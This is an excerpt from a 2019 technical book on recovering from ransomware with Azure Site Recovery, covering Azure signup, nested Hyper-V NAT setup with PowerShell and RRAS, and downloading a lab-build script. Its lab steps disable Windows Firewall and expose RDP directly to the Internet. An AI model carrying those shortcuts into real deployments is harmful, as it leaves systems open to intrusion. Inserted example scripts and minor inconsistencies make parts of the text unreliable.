English Pages 193
Surviving a Ransomware Attack with Azure Site Recovery Volume 1
By Microsoft MVPs: Dave Kawula, Cristal Kawula, Emile Cabot, Cary Sun, John O’Neill Sr - rMVP

PUBLISHED BY MVPDays Publishing http://www.mvpdays.com

Copyright © 2019 by MVPDays Publishing. All rights reserved. No part of this book may be reproduced or transmitted in any form or by any means without the prior written permission of the publisher.

ISBN: TBD

Warning and Disclaimer
Every effort has been made to make this manual as complete and as accurate as possible, but no warranty or fitness is implied. The information provided is on an “as is” basis. The authors and the publisher shall have neither liability nor responsibility to any person or entity concerning any loss or damages arising from the information contained in this book.

Feedback Information
We’d like to hear from you! If you have any comments about how we could improve the quality of this book, please don’t hesitate to contact us by visiting www.checkyourlogs.net or sending an email to [email protected].
Foreword by

Acknowledgments

From Dave

Cristal, you are my rock and my source of inspiration. For the past 20+ years you have been there with me every step of the way. Not only are you the “BEST Wife” in the world, you are my partner in crime.

Christian, Trinity, Keira, Serena, Mickaila, Mackenzie, and Rycker, you kids are so patient with your dear old dad when he locks himself away in the office for yet another book. Taking the time to watch you grow in life, sports, and become little leaders of this new world is incredible to watch.

Thank you, Mom and Dad (Frank and Audry), and my brother Joe. You got me started in this crazy IT world when I was so young. Brother, you mentored me along the way, both coaching me in hockey and helping me learn what you knew about PCs and Servers. I’ll never forget us as teenage kids working the IT Support contract for the local municipal government. Remember dad had to drive us to site because you weren’t old enough to drive ourselves yet. A great career starts with the support of your family, and I’m so lucky because I have all the support one could ever want.

Last but not least, the MVPDays volunteers: you have donated your time and expertise and helped us run the event in over 20 cities across North America. Our latest journey has us expanding the conference worldwide as a virtual conference. For those of you that will read this book, your potential is limitless. Just expand your horizons, and you never know where life will take you.
About the Authors
Dave Kawula – Microsoft MVP

Dave is a Microsoft Most Valuable Professional (MVP) with over 20 years of experience in the IT industry. His background includes data communications networks within multi-server environments, and he has led architecture teams for virtualization, System Center, Exchange, Active Directory, and Internet gateways. Very active within the Microsoft technical and consulting teams, Dave has provided deep-dive technical knowledge and subject matter expertise on various System Center and operating system topics.

Dave is well-known in the community as an evangelist for Microsoft, 1E, and Veeam technologies. Locating Dave is easy as he speaks at several conferences and sessions each year, including TechEd, Ignite, MVP Days Community Roadshow, and VeeamOn. Recently Dave has been honored to take on the role of Conference Co-Chair of TechMentor with fellow MVP Sami Laiho. The lineup of speakers and attendees that have been to this conference over the past 20 years is fantastic. Come down to Redmond or Orlando in 2018, and you can meet him in person. Check out his speaking site at www.davekawula.com. He recently tied for 1st place out of 1800 speakers at the Microsoft Ignite Conference in Orlando.

As the founder and Managing Principal Consultant at TriCon Elite Consulting, Dave is a leading technology expert for both local customers and large international enterprises, providing optimal guidance and methodologies to achieve and maintain an efficient infrastructure.

BLOG: www.checkyourlogs.net
Twitter: @DaveKawula
Cristal Kawula – Microsoft MVP

Cristal Kawula is the co-founder of MVPDays Community Roadshow and #MVPHour live Twitter Chat. She was also a member of the Technical Advisory board and is the President of TriCon Elite Consulting. Cristal is also only the 2nd Woman in the world to receive the prestigious Veeam Vanguard award. Cristal can be found speaking at Microsoft Ignite, MVPDays, and other local user groups. She is extremely active in the community and has recently helped publish a book for other Women MVPs called Voices from the Data Platform. This year at Microsoft Ignite she led community meetups for various topics such as Women in IT, Parenting in IT, Diversity in Tech, and becoming a Community Rockstar.

BLOG: http://www.checkyourlogs.net
Twitter: @supercristal1
Emile Cabot – Microsoft MVP

Emile started in the industry during the mid-90s working at an ISP and designing celebrity web sites. He has a strong operational background specializing in Systems Management and collaboration solutions and has spent many years performing infrastructure analyses and solution implementations for organizations ranging from 20 to over 200,000 employees. Coupling his wealth of experience with a small partner network, Emile works very closely with TriCon Elite, 1E, and Veeam to deliver low-cost solutions with minimal infrastructure requirements. He actively volunteers as a member of the Canadian Ski Patrol, providing over 250 hours each year for first aid services and public education at Castle Mountain Resort and in the community.

BLOG: http://www.checkyourlogs.net
Twitter: @ecabot
Cary Sun – Microsoft MVP

Cary Sun is a CISCO CERTIFIED INTERNETWORK EXPERT (CCIE No.4531) and MCSE, MCIPT, Citrix CCA with over twenty years in the planning, design, and implementation of network technologies and Management and system integration. Background includes hands-on experience with multiplatform, all LAN/WAN topologies, network administration, E-mail and Internet systems, security products, PCs and Servers environment. Expertise is analyzing user’s needs and coordinating system designs from concept through implementation. Exceptional analysis, organization, communication, and interpersonal skills. Demonstrated ability to work independently or as an integral part of a team to achieve objectives and goals.

Specialties: CCIE / CCNA / MCSE / MCITP / MCTS / MCSA / Solution Expert / CCA

Cary is a very active blogger at checkyourlogs.net and always available online for questions from the community. His passion for technology is contagious, and he makes everyone around him better at what they do.

Blog: http://www.checkyourlogs.net
Twitter: @SifuSun
John O’Neill Sr – Re-Connect Microsoft MVP
Contents

Foreword by
Acknowledgments
    From Dave
About the Authors
    Dave Kawula – Microsoft MVP
    Cristal Kawula – Microsoft MVP
    Emile Cabot – Microsoft MVP
    Cary Sun – Microsoft MVP
    John O’Neill Sr – Re-Connect Microsoft MVP
Contents
Introduction
    MVPDays Online
    Sample Files
    Additional Resources
Chapter 1 Setting up your Azure Subscription from Scratch
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
    Building a Windows Server 2016 Virtual Machine
    Creating Multiple Internal and External IP’s for the Lab
    Enable Hyper-V in the LAB Virtual Machine
    Configuring NAT Networking with one Public IP Address
    Configuring NAT Networking with Multiple Public IP Address
    Adding an IP Address to the lab Host (VM)
    Configuring Routing and Remote Access on the Azure Nested Virtual Machine
    Configure NAT Rules in RRAS for the Lab
    Disable Windows Firewall
    Create a NAT Rule in the Azure NSG for the Lab
    Testing the NAT Rules in the lab
    Using PowerShell to automate RRAS NAT Rule Configurations
Chapter 3 Using BigDemo to Build your Lab
    Lab Server Names
    Building the Lab with BigDemo_ASR_WAC.PS1
Chapter 4 Configuring Windows Admin Center
    Install Google Chrome and Mozilla FireFox
    Configure Windows Admin Center
    Configure Azure Integration
    Configure Azure Backup
    Verifying Backups locally with the Backup Microsoft Azure Backup Agent
    Configuring Windows Azure Update Management
    Configure Azure Site Recovery
    Upgrade to Security Center Standard in Azure
Chapter 5 Windows Defender Advanced Threat Protection ATP
    Onboarding a Server with Windows Defender ATP
    Reviewing an Incident with Windows Defender Advanced Threat Protection
Chapter 6 Simulating a Ransomware Attack
    KnowBe4 Ransomware Simulator on Windows Server 2019
    Enabling Ransomware Protection on Windows Server 2019
    Executing a Ransomware Attack with PowerShell
Chapter 7 Recovering from Ransomware using Azure Site Recovery
    Notes from the Field
    Why Airgapped Replicas are the only choice
    Why Planned Failover is no longer an option
    Failover Now is the only Option
    Watch you Six (Clock)
    Do not connect your Azure Site Recovery Virtual Machines to a live Site-to-Site VPN
    When can I get back into my data?
    Ok, so I didn’t listen and lost everything now what?
    Don’t forget to tune your Replication Policy
    Testing Failover can be a quick Ransomware Fix
    Reset Settings for your Azure Site Recovery Hyper-V Host
    Enable Diagnostic Logging for Azure Site Recovery
    Zero Day time to Failover
    Assuming an Admin Level breach Failing over 100 % to Azure
    Executing a PowerShell based Ransomware Attack on Domain Controllers.
    Encrypting the Sysvol Folder
    Taking Down Production Killing Domain Controllers with Ransomware
    Encrypting the Active Directory Database
    Survival Mode Recovering to Azure
    Tick Tock time to make a decision – We are Recovering to Azure
    Performing the Double Swing Recovery
Chapter 8 Disaster Recovery items left forgotten
Chapter 9 Join us at MVPDays and meet great MVP’s like this in person
    Live Presentations
    Video Training
    Live Instructor-led Classes
    Consulting Services
Introduction
MVPDays Online

The purpose of this book is to showcase the fantastic expertise of our guest speakers of MVPDays Online. They have so much passion, expertise, and expert knowledge that it only seemed fitting to write it down in a book.

MVPDays was founded by Cristal and Dave Kawula back in 2013. It started as a simple idea: “There’s got to be a good way for Microsoft MVPs to reach the IT community and share their vast knowledge and experience in a fun and engaging way.” I mean, what is the point in recognizing these bright and inspiring individuals and not leveraging them to inspire the community that they are a part of?

We often get asked the question, “Who should attend MVPDays?” Anyone who has an interest in technology, is eager to learn, and wants to meet other like-minded individuals. This Roadshow is not just for Microsoft MVPs; it is for anyone in the IT community. Make sure you check out the MVPDays website at www.mvpdays.com. You never know, maybe the roadshow will be coming to a city near you.

The goal of this particular book is to show you how to survive a ransomware attack using Azure Site Recovery. Each chapter is broken down into a unique tip, and we hope you find some immense value in what we have written.
Sample Files

All sample files for this book can be downloaded from www.checkyourlogs.net and https://github.com/dkawula/Surviving-a-Ransomware-Attack-Using-Azure-Site-Recovery

Additional Resources

In addition to all the tips and tricks provided in this book, you can find extra resources like articles and video recordings on our blog http://www.checkyourlogs.net
Chapter 1
Setting up your Azure Subscription from Scratch

Microsoft Azure has lots of features, and to use them you need a Microsoft Azure account. It’s straightforward to create one, and you also get $200 in credits for the first month. If you are new to Microsoft Azure, don’t worry: I am going to show you how to create a free Azure account with the $200 credit. Follow the steps below.
1. Go to https://www.azure.com and then click Free account.
2. On the free account page, click Start free.
3. If you already have an account with Microsoft (e.g., Office 365, outlook.com, …), enter your email address and then click Next. If you don’t have a Microsoft account, click Create one.
4. If your email address is used with more than one account from Microsoft, you need to select which account you want to use.
5. Enter your password and then click Sign in
6. On the About you page, enter your personal information and then click Next.
7. On the Identity verification by card page, enter your credit card information and then click Next. Don’t worry, Microsoft won’t charge you until you upgrade your free account to pay-as-you-go or another account type.
8. On the Agreement page, select “I agree to the subscription agreement, offer details, and privacy statement” and “I would like information, tips, and offers from Microsoft or selected partners about Azure, including Azure Newsletter, Pricing updates, and other Microsoft products and services”, and then click Sign up.
9. Congratulations! You’re ready to start with Azure and get $250 credit for free. Click Go to the portal and enjoy the Azure features there.
10. That’s it. You have now successfully set up your first Azure Tenant and have access to the Azure Portal.
Chapter 2
Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

In this chapter, we are going to show you how to build a Hyper-V nested VM with multiple public IP addresses. In this lab configuration, you only need to pay Microsoft for one Hyper-V host (VM) with storage and public IP addresses. After it is configured, you can install a firewall, create VMs and a load balancer, and configure custom routing, port forwarding, and so on. These scenarios can be used to build real-world labs for test, development, or even proofs of concept.

Building a Windows Server 2016 Virtual Machine

1. Log on to your Microsoft Azure account and select Create a resource.
2. On the New page, select Windows Server 2016 VM
3. On the Create a virtual machine page, click Basics and select your Azure Subscription to pay for this virtual machine.
4. Select Create new under Resource group and enter a resource group name. I recommend using the same name as your virtual machine, because it makes your resources easier to maintain. Then click OK.
5. Virtual Machine Name: Enter the same name as your resource group.
Region: Select the region for the virtual machine. In my case, I am using West US 2.
Availability options: Keep the default setting.
Image: Select Windows Server 2016 Datacenter.
Size: Click Change size and select one of the Dv3 or Ev3 VM sizes, because we need to enable nested virtualization.
Username: Enter the login user name.
Password: Enter the login password.
Confirm password: Re-enter the login password.
Public inbound ports: Select Allow selected ports.
Select inbound ports: Select RDP (3389).
Already have a Windows license: Select Yes if you already have a license.
Confirmation: Select I confirm I have an eligible Windows license with Software Assurance or Windows Server subscription to apply for this Azure Hybrid Benefit.
6. On the Create a Virtual Machine page, click Disks.
OS disk type: Select Premium SSD
DATA DISKS: Select Create and attach a new disk (this storage space is for your nested VMs)

7. On the Create a new disk page, configure the settings as follows and then click OK.
Disk type: Select Premium SSD
Name: Keep the default name
Size (GiB): 4095
Source type: None
8. On the Create a virtual machine page, click Networking.
Virtual network: Select your vnet if you have an existing one; if not, you can keep the default settings.
Subnet: Select the subnet name if you have an existing subnet; if not, you can keep the default settings.
Public IP: Click Create new

9. On the Create Public IP address page, configure the settings as follows:
Name: Enter the Public IP address name.
SKU: Basic
Assignment: Static

10. Complete the Networking settings as follows:
Network security group: Basic
Public inbound ports: Allow selected ports
Select inbound ports: RDP
Accelerated networking: On
1. On the Create a virtual machine page, click Management and keep the settings as default.
11. On the Create a virtual machine page, click Guest config and keep the settings as default.
12. On the Create a virtual machine page, click Tags and keep the settings as default.
13. On the Create a virtual machine page, click Review + create and make sure Validation passed and then click Create.
Creating Multiple Internal and External IP’s for the Lab

1. On the Microsoft Azure portal page, select Virtual machines.
2. On the Virtual machines page, click GDMCALABHV1.
3. On the GDMCALABHV1 page, select Networking.
4. On the GDMCALABHV1-Networking page, select Network Interface: gdmcalabhv1238.
5. On the Network Interface page, select IP configurations.
6. On the IP configurations page, select ipconfig1.
7. Change assignment setting from Dynamic to Static, and then click Save.
8. Go back to the IP configurations page, click Add.
9. On the Add IP configuration page, configure the settings as follows and then click OK.
Name: ipconfig2
Private IP address Allocation: Static
IP address: 10.10.1.9
Public IP address: Enable
IP address: Click Configure required settings
10. Choose public IP address: Create new
Name: Enter a name for the Public IP
SKU: Basic
Assignment: Static, and then click OK
11. On the Add IP configuration page, click OK.
12. Repeat the Add IP configuration steps if you need more public IP addresses.
Enable Hyper-V in the LAB Virtual Machine

1. Start the Azure virtual machine and log in.
2. Open Disk Management to partition and format your new 4TB storage space. (Use ReFS + 64 KB Block Size.)
3. On the Server Manager Dashboard, click Add roles and features.
4. On the Before you begin page, click Next.
5. On the Select installation type, select Role-based or feature-based installation and then click Next.
6. On the Select destination server page, click Next.
7. On the Select server roles page, select Hyper-V, click Add Features and then click Next.
8. On the Select features page, click Next.
9. On the Hyper-V page, click Next.
10. On the Create Virtual Switches page, don’t select any interface and click Next.
11. On the Virtual Migration page, click Next.
12. On the Default Stores page, you can change the default location to your new 4TB storage space and then click Next.
13. On the Confirm installation selections page, select Restart the destination server automatically if required and then click Install.
14. Log in to the Azure virtual machine after it has restarted.
15. On the Installation progress page, click Close.
Configuring NAT Networking with one Public IP Address

To configure NAT networking, we need to create an internal virtual switch for the nested guest VMs. In general, there are two options for networking with nested virtual machines: MAC address spoofing and NAT networking. Unfortunately, MAC address spoofing is not possible in a public cloud environment. So, if you use the Azure virtual machine network interface as your Hyper-V external virtual switch and assign it to nested guest VMs, the guest VMs won’t be able to access the Internet. At this point, we have no choice but to use NAT networking. The steps below show how to configure a NetNat virtual switch with a single public IP address.
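1. We can create an internal virtual switch and create NAT rules with the following PowerShell cmdlets:

# Create the internal virtual switch for the nested guest VMs
New-VMSwitch -Name "NATNetwork" -SwitchType Internal
# List the adapters and note the ifIndex of "vEthernet (NATNetwork)"; it is 14 in this lab
Get-NetAdapter
# Assign the NAT gateway address to that adapter
New-NetIPAddress -IPAddress 192.168.100.1 -PrefixLength 24 -InterfaceIndex 14
# Create the NAT network for the internal prefix
New-NetNat -Name "NATNetwork" -InternalIPInterfaceAddressPrefix 192.168.100.0/24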
2. You can also configure port forwarding with the following PowerShell cmdlets:

# Forward TCP 443 on the host to the nested VM at 192.168.100.99
Add-NetNatStaticMapping -ExternalIPAddress "0.0.0.0/24" -ExternalPort 443 -Protocol TCP -InternalIPAddress 192.168.100.99 -InternalPort 443 -NatName NatNetwork
# Forward TCP 80 on the host to the same nested VM
Add-NetNatStaticMapping -ExternalIPAddress "0.0.0.0/24" -ExternalPort 80 -Protocol TCP -InternalIPAddress 192.168.100.99 -InternalPort 80 -NatName NatNetwork
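The two steps above as one re-runnable script, added here as an example and not taken from the book or its sample files: it resolves the interface index of the switch's host adapter by name instead of hard-coding 14, skips anything that already exists, and ends by listing every port forward so the exposed surface can be reviewed. The variable names are this example's own; the switch name, addresses and ports are the chapter's.

```powershell
#Requires -RunAsAdministrator
# Added example: idempotent NetNat setup for the nested lab, plus an audit of
# the resulting port forwards. Variable names are assumptions of this example.

$SwitchName   = 'NATNetwork'        # internal switch and NAT name used in the chapter
$GatewayIP    = '192.168.100.1'     # host-side address, gateway for the nested guests
$PrefixLength = 24
$NatPrefix    = '192.168.100.0/24'
$GuestIP      = '192.168.100.99'    # nested VM that receives the forwarded ports
$ForwardPorts = 443, 80             # TCP ports published to that guest

# 1. Create the internal switch only if it is missing.
if (-not (Get-VMSwitch -Name $SwitchName -ErrorAction SilentlyContinue)) {
    New-VMSwitch -Name $SwitchName -SwitchType Internal | Out-Null
}

# 2. Find the host vNIC that Hyper-V created for the switch. Its index differs
#    from host to host, so look it up by name rather than typing a number.
$adapter = Get-NetAdapter -Name "vEthernet ($SwitchName)" -ErrorAction Stop

# 3. Assign the gateway address unless the adapter already has it.
$hasGateway = Get-NetIPAddress -InterfaceIndex $adapter.ifIndex -AddressFamily IPv4 `
                  -ErrorAction SilentlyContinue |
              Where-Object IPAddress -eq $GatewayIP
if (-not $hasGateway) {
    New-NetIPAddress -IPAddress $GatewayIP -PrefixLength $PrefixLength `
        -InterfaceIndex $adapter.ifIndex | Out-Null
}

# 4. Create the NAT. A host supports a single NAT network, so stop with a clear
#    message if a different one is already defined.
$otherNat = Get-NetNat | Where-Object Name -ne $SwitchName
if ($otherNat) {
    throw "Another NAT is already defined on this host: $($otherNat.Name -join ', ')"
}
$nat = Get-NetNat -Name $SwitchName -ErrorAction SilentlyContinue
if (-not $nat) {
    New-NetNat -Name $SwitchName -InternalIPInterfaceAddressPrefix $NatPrefix | Out-Null
}
elseif ($nat.InternalIPInterfaceAddressPrefix -ne $NatPrefix) {
    throw "NAT '$SwitchName' exists with prefix $($nat.InternalIPInterfaceAddressPrefix), expected $NatPrefix"
}

# 5. Publish each port once. Re-running the script adds no duplicate mappings.
foreach ($port in $ForwardPorts) {
    $present = Get-NetNatStaticMapping -NatName $SwitchName -ErrorAction SilentlyContinue |
               Where-Object { $_.Protocol -eq 'TCP' -and $_.ExternalPort -eq $port }
    if (-not $present) {
        Add-NetNatStaticMapping -NatName $SwitchName -Protocol TCP `
            -ExternalIPAddress '0.0.0.0/24' -ExternalPort $port `
            -InternalIPAddress $GuestIP -InternalPort $port | Out-Null
    }
}

# 6. Audit: every row is a service on a nested guest that the host forwards to.
#    Anything not listed in $ForwardPorts was added outside this script.
Get-NetNatStaticMapping -NatName $SwitchName |
    Sort-Object ExternalPort |
    Format-Table NatName, Protocol, ExternalIPAddress, ExternalPort,
                 InternalIPAddress, InternalPort -AutoSize
```

A mapping listed by the final command is reachable from the Internet only once the Azure network security group also allows that port; the VM built earlier in this chapter admits RDP (3389) only.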
Configuring NAT Networking with Multiple Public IP Address

For a real proof of concept (PoC) or production environment, we may need more than one public IP address. We have found that this isn’t possible with the NetNat internal vSwitch. As a result, we have figured out how to set this up using Microsoft Routing and Remote Access on the host (Azure VM). The following steps are the most critical part of this book. They allow us to add as many external public IP addresses in Azure as we need and NAT them into our lab virtual machines. This gives you the most realistic lab experience possible.

Adding an IP Address to the lab Host (VM)

1. Log in to the Azure virtual machine.
2. Open a command prompt, run ipconfig /all, and then write down the DNS IP address.
3. Add all of the IP addresses to the Azure virtual machine network interface; in my case these are 10.10.1.8-10.
4. Re-run ipconfig /all, and you will now see all of the IP addresses under the network interface.
5. Open Hyper-V Manager tool and click Virtual Switch Manager.
6. Select Internal and click Create Virtual Switch.
7. Change switch name to NAT Network Switch and then click OK.
8. Assign IP address as 192.168.100.1/24 to vEthernet (NAT Network Switch)
Configuring Routing and Remote Access on the Azure Nested Virtual Machine

To configure port forwarding (NAT) into our lab, we will use the built-in Routing and Remote Access role in Windows. The steps below walk you through the required configuration.

1. Log in to the nested Azure virtual machine.
1. On the Dashboard page, select Add Roles and features.
2. On the Before you begin page, click Next.
3. On the Select installation type page, click Next.
4. On the Select destination server page, click Next.
5. On the Select server roles page, select Remote Access and click Next.
6. On the Select features page, click Next.
7. On the Remote Access page, click Next.
8. On the Select Role Services page, select Routing, click Add Features, and then click Next.
9. On the Web Server Role (IIS) page, click Next.
10. On the Select role services page, click Next.
11. On the Confirm installation selections page, select Restart the destination server automatically if required, and then click Install.
12. On the Installation progress page, click Close. 13. Open Routing and Remote Access tool.
58
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
14. Right-click the server name and select Configure and Enable Routing and Remote Access.
15. On the Welcome page, click Next.
59
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
16. On the Configuration page, select Network address translation (NAT), click Next.
60
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
17. On the NAT Internet Connection page, select Ethernet 2 as public Interface, click Next.
61
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
18. On the Name and Address Translation Services page, select Enable basic name and address services, click Next.
62
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
19. On the Address Assignment Range page, click Next.
63
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
20. Click Finish on the Completing setup wizard page.
64
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
Configure NAT Rules in RRAS for the Lab
1. Open Routing and Remote Access, expand IPv4, and select NAT.
2. Right-click Ethernet 2 and select Properties.
3. Select Address Pool and click Add.
4. Enter the IP addresses and mask and click OK. These are the IP addresses that were created with Public IP addresses in the Azure portal.
5. Select Services and Ports and then click Add.
6. Use the following settings for TCP port 443 port forwarding and then click OK.
   Description of Services: TCP443-10.10.1.10
   On this address pool entry: 10.10.1.10
   Protocol: TCP
   Incoming port: 443
   Private IP address: 192.168.100.99
   Outgoing port: 443
7. On the Ethernet 2 properties page, click OK.
8. Repeat these steps to create port mappings for port 80 and port 3389 as well.
Disable Windows Firewall
1. We will use the Azure NSG, so disable Windows Firewall on the Azure Virtual Machine.
2. On the Server Manager page, select Local Server and then select Windows Firewall (Public: On, Private: On).
3. On the Windows Firewall page, select Turn Windows Firewall on or off.
4. On the Customize page, select Turn off Windows Firewall for both Private Network and Public Network and then click OK.
Create a NAT Rule in the Azure NSG for the Lab
The following steps will show you how to create a NAT Rule on the Azure NSG.
1. Go back to the Azure portal and log in with your account.
2. On the Dashboard page, select Virtual machines.
3. On the Virtual machines page, select the virtual machine which you are using as the Hyper-V host.
4. On the GDMCALABHV1 virtual machine page, select Networking.
5. On the Networking page, click Add inbound port rule.
6. On the Add inbound security rule page, change Destination port ranges to 443, Protocol to TCP, Name to Port_443 and then click Add.
7. Repeat the steps to add port 80.
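The inbound rules can also be scripted with the Az PowerShell module, which makes it easy to limit the source to your own address and to list any rule that is open to the whole Internet. This is an added example, not the authors' code; the resource group name, NSG name and source prefix are placeholders, and the function names are hypothetical.

```powershell
# Added example. Requires the Az.Network module and an authenticated session (Connect-AzAccount).
# 'LabRG', 'GDMCALABHV1-nsg' and 203.0.113.10/32 are placeholder values, not taken from the book.

function Get-InternetOpenNsgRule {
    # Lists inbound Allow rules whose source is the whole Internet.
    param(
        [Parameter(Mandatory)][string]$ResourceGroupName,
        [Parameter(Mandatory)][string]$NsgName
    )
    $nsg = Get-AzNetworkSecurityGroup -ResourceGroupName $ResourceGroupName -Name $NsgName
    $nsg.SecurityRules |
        Where-Object {
            $_.Direction -eq 'Inbound' -and $_.Access -eq 'Allow' -and
            (@($_.SourceAddressPrefix) | Where-Object { $_ -in '*', 'Internet', '0.0.0.0/0' })
        } |
        Select-Object Name, Priority, Protocol, DestinationPortRange, SourceAddressPrefix
}

function Add-LabInboundRule {
    # Creates one Port_<n> rule per port, restricted to a single source prefix.
    param(
        [Parameter(Mandatory)][string]$ResourceGroupName,
        [Parameter(Mandatory)][string]$NsgName,
        [Parameter(Mandatory)][int[]]$Port,
        [Parameter(Mandatory)][string]$SourcePrefix,
        [int]$StartPriority = 1000
    )
    $nsg  = Get-AzNetworkSecurityGroup -ResourceGroupName $ResourceGroupName -Name $NsgName
    $used = @($nsg.SecurityRules | Where-Object Direction -eq 'Inbound' | ForEach-Object Priority)
    $priority = $StartPriority

    foreach ($p in $Port) {
        $name = "Port_$p"
        if ($nsg.SecurityRules.Name -contains $name) {
            Write-Warning "Rule $name already exists; review its source prefix instead of adding a duplicate."
            continue
        }
        # NSG priorities must be unique per direction, so skip values already taken.
        while ($used -contains $priority) { $priority++ }

        $nsg | Add-AzNetworkSecurityRuleConfig -Name $name -Access Allow -Protocol Tcp `
            -Direction Inbound -Priority $priority `
            -SourceAddressPrefix $SourcePrefix -SourcePortRange '*' `
            -DestinationAddressPrefix '*' -DestinationPortRange $p | Out-Null
        $used += $priority
    }

    # Push the modified rule set to Azure, then report anything still open to the Internet.
    $nsg | Set-AzNetworkSecurityGroup | Out-Null
    Get-InternetOpenNsgRule -ResourceGroupName $ResourceGroupName -NsgName $NsgName
}

# Example call: the ports forwarded in RRAS, reachable only from one tester address.
# Add-LabInboundRule -ResourceGroupName 'LabRG' -NsgName 'GDMCALABHV1-nsg' `
#     -Port 443, 80, 3389 -SourcePrefix '203.0.113.10/32'
```

Because Windows Firewall is turned off on the host in this lab, the NSG is the only filter in front of the forwarded ports, so an empty result from Get-InternetOpenNsgRule is the state to aim for.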
Testing the NAT Rules in the lab
Now, we can test the port forwarding functionality and make sure it is working.
1. Create a Guest Virtual Machine on the Nested Azure Host (VM). Make sure the network adapter is configured to use the NAT Network Switch, and assign the IP address 192.168.100.99/24 with a default gateway of 192.168.100.1. You can use 8.8.8.8 as DNS.
2. Enable Remote Desktop to test RDP (TCP port 3389) and turn off Windows Firewall.
3. Install the IIS features on this machine. If you would like to test SSL (port 443), set up and configure the SSL certificate in IIS.
4. RDP from the Internet to the Web-Test machine via the Public IP address (GDMCALABHV1-PublicIP3).
5. If you can successfully connect, your NAT Rules are working through the Azure NSG and also through the RRAS configuration on the Nested Host in Azure.
6. Next, test port 80 from the Internet via (GDMCALABHV1-PublicIP3), and it will show you the default IIS website. This also validates that the Port Forwarding is working.
7. Last, you can validate the NAT Session Mapping on the Azure Nested Host (VM) using the Routing and Remote Access tool.
Using PowerShell to automate RRAS NAT Rule Configurations
Configuring NAT Rules in Routing and Remote Access can be very time consuming and tedious. In the steps below we will show you how to bulk configure rules using PowerShell. First, review the following code:

    # Interface, protocol and address pair used for every port mapping
    $Port=1000
    $HostInterfaceName="Ethernet 4"
    $Protocol="TCP"
    $PublicIP="10.10.1.101"
    $PrivateIP="192.168.100.101"

    # Add one RRAS NAT port mapping per port, from 1000 through 1010
    for ($Port=1000; $Port -le 1010; $Port++) {
        netsh routing ip nat add portmapping name=$HostInterfaceName proto=$Protocol publicip=$PublicIP publicport=$Port privateip=$PrivateIP privateport=$Port
    }

This will create a Custom Service (NAT Rule) in Routing and Remote Access on Interface Ethernet 4, TCP, Ports 1000-1010.
Let’s run the script and see what happens.
You can also run netsh routing dump to see the output.
Overall, this is an easy way to automate the creation of the NAT Rules for your lab.
Chapter 3 Using BigDemo to Build your Lab
Chapter 3
Using BigDemo to Build your Lab

Lab Server Names
The following table describes the required Virtual Machines to build this lab. This lab is designed to be built on a Hyper-V Host Server with a minimum of 16 GB of RAM. An automation script called BigDemo_ASR_WAC.ps1 has been used to provision this lab environment. You can download a copy from here: https://github.com/dkawula/Surviving-a-Ransomware-Attack-Using-Azure-Site-Recovery/blob/master/BigDemo_ASR_WAC.ps1

| Hostname | Role | Operating System |
|---|---|---|
| DC01 | Primary Domain Controller running Active Directory Certificate Services as an Enterprise Root | Windows Server 2019 |
| DC02 | Secondary Domain Controller running Active Directory | Windows Server 2019 |
| S2D2019-1 | Storage Spaces Direct – Hyper-V Cluster Node LTSC | Windows Server 2019 |
| S2D2019-2 | Storage Spaces Direct – Hyper-V Cluster Node LTSC | Windows Server 2019 |
| S2D2019-3 | Storage Spaces Direct – Hyper-V Cluster Node LTSC | Windows Server 2019 |
| S2D2019-4 | Storage Spaces Direct – Hyper-V Cluster Node LTSC | Windows Server 2019 |
| S2D2019-5 | Storage Spaces Direct – Hyper-V Cluster Node LTSC | Windows Server 2019 |
| S2D2019-6 | Storage Spaces Direct – Hyper-V Cluster Node LTSC | Windows Server 2019 |
| S2D2019-7 | Storage Spaces Direct – Hyper-V Cluster Node LTSC | Windows Server 2019 |
| S2D2019-8 | Storage Spaces Direct – Hyper-V Cluster Node LTSC | Windows Server 2019 |
| S2D2019DR-1 | Storage Spaces Direct – Hyper-V Cluster Node LTSC | Windows Server 2019 |
| S2D2019DR-2 | Storage Spaces Direct – Hyper-V Cluster Node LTSC | Windows Server 2019 |
| S2D2019DR-3 | Storage Spaces Direct – Hyper-V Cluster Node LTSC | Windows Server 2019 |
| S2D2019DR-4 | Storage Spaces Direct – Hyper-V Cluster Node LTSC | Windows Server 2019 |
| DRTitan01 | Standalone – Hyper-V Cluster Node LTSC | Windows Server 2019 |
| Router01 | Windows NAT Router for the LAB | Windows Server 2019 |
| DHCP01 | DHCP Server for the Lab | Windows Server 2019 |
| Management01 | Management01 | Windows Server 2019 |
| AZHVHost | DS8 Virtual Machine in Azure running Nested Virtualization and Hyper-V. This will be the host that we run the lab on. This could also be a Laptop or a physical server in your environment. | Windows Server 2019 |
Building the Lab with BigDemo_ASR_WAC.PS1
For this book, we wanted to help you build a lab that you could easily follow along with. If you have read some of our other books, you would have seen a script that we use called BigDemo. BigDemo is a PowerShell script that builds a lab environment including AD, DHCP, Management Servers, Clients, Application Servers, and others. It is highly customizable, and we have created a special edition just for this book. Follow the instructions below to download the script from our GitHub repository and start building your very own lab to follow along with.

1. Log on to the AZHVHost machine in Azure as Administrator.
2. Open an administrative PowerShell prompt and type:

    Invoke-WebRequest -Uri "https://raw.githubusercontent.com/dkawula/Surviving-a-Ransomware-Attack-Using-Azure-Site-Recovery/master/BigDemo_ASR_WAC.ps1" -OutFile "C:\Post-Install\BigDemo_ASR_WAC.PS1"

3. Next, download a copy of Windows Server 2016 RTM from the Microsoft Eval Center. For our lab, we have a drive on our Hyper-V Host, F:\. Save the ISO to F:\DCBuild_Insider.
   https://www.microsoft.com/en-us/evalcenter/evaluate-windows-server-2016/
4. Next, download a copy of Windows Server Insider 17079 from the Microsoft Eval Center. For our lab, we have a drive on our Hyper-V Host, F:\. Save the ISO to F:\DCBuild_Insider.
   https://blogs.windows.com/windowsexperience/2018/01/23/announcing-windows-server-insider-preview-build-17079/
5. Copy BigDemo_Insider.PS1 from C:\Post-Install to F:\DCBuild_Insider.
